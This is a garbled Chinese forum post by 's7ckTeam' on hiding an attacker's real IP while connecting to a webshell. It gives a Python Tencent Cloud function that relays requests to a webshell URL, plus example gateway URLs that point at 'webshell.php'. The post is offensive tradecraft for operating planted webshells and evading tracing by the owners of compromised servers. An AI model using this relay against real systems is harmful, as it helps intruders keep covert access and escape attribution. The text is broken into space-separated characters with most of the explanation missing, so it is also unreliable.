[27311] 2021-08-10_【防溯源】利用腾讯云来隐藏连接Webshell的真实IP

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2021-08-10_【防溯源】利用腾讯云来隐藏连接Webshell的真实IP W e b s h e l l I P     M s 0 8 0 6 7   2 0 2 1 - 0 8 - 1 0 #   , 8 #   , 7 M S 0 8 0 6 7 M S 0 8 0 6 7 C D N W e b s h e l l I P 使 i n d e x . p y #   - * -   c o d i n g :   u t f 8   - * - i m p o r t   r e q u e s t s i m p o r t   j s o n d e f   g e t u r l ( u r l s t r ) :     j u r l s t r   =   j s o n . d u m p s ( u r l s t r )     d i c t _ u r l   =   j s o n . l o a d s ( j u r l s t r )     r e t u r n   d i c t _ u r l [ ' u ' ] d e f   m a i n _ h a n d l e r ( e v e n t ,   c o n t e x t ) :     u r l   =   g e t u r l ( e v e n t [ ' q u e r y S t r i n g ' ] )     p o s t d a t a   =   e v e n t [ ' b o d y ' ]     h e a d e r s = e v e n t [ ' h e a d e r s ' ]     r e s p = r e q u e s t s . p o s t ( u r l , d a t a = p o s t d a t a , h e a d e r s = h e a d e r s , v e r i f y = F a l s e )
- >     r e s p = r e q u e s t s . p o s t ( u r l , d a t a = p o s t d a t a , h e a d e r s = h e a d e r s , v e r i f y = F a l s e )     r e s p o n s e = {         " i s B a s e 6 4 E n c o d e d " :   F a l s e ,         " s t a t u s C o d e " :   2 0 0 ,         " h e a d e r s " :   { ' C o n t e n t - T y p e ' :   ' t e x t / h t m l ; c h a r s e t = ' + r e s p . a p p a r e n t _ e n c o d i n g } ,         " b o d y " :   r e s p . t e x t     }     r e t u r n   r e s p o n s e
A P I 访
访 ? u = w e b s h e l l d o c k e r - c o m p o s e P H P d o c k e r - c o o m p o s e P H P h t t p s : / / g i t h u b . c o m / n a n o n i n j a / d o c k e r - n g i n x - p h p - m y s q l h t t p s : / / s x x x x x x x x x x x x x x x x x . g z . a p i g w . t e n c e n t c s . c o m / r e l e a s e / h e l l o w o r l d - 1 6 2 7 2 2 9 2 4 7 ? u = h t t p : / / x x x x / w e b s h e l l . p h p
w e b s h e l l P H P l o g s I P 访 w e b s h e l l u r l 访 ? u = h t t p s : / / s e r x x x x x x x x x x x x . g z . a p i g w . t e n c e n t c s . c o m / r e l e a s e / f o r w a r d e d ? u = h t t p : / / v p s - i p / i n d e x . p h p

访 w e b s h e l l I P C D N I P   - >  
    5 0 0 0 +

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则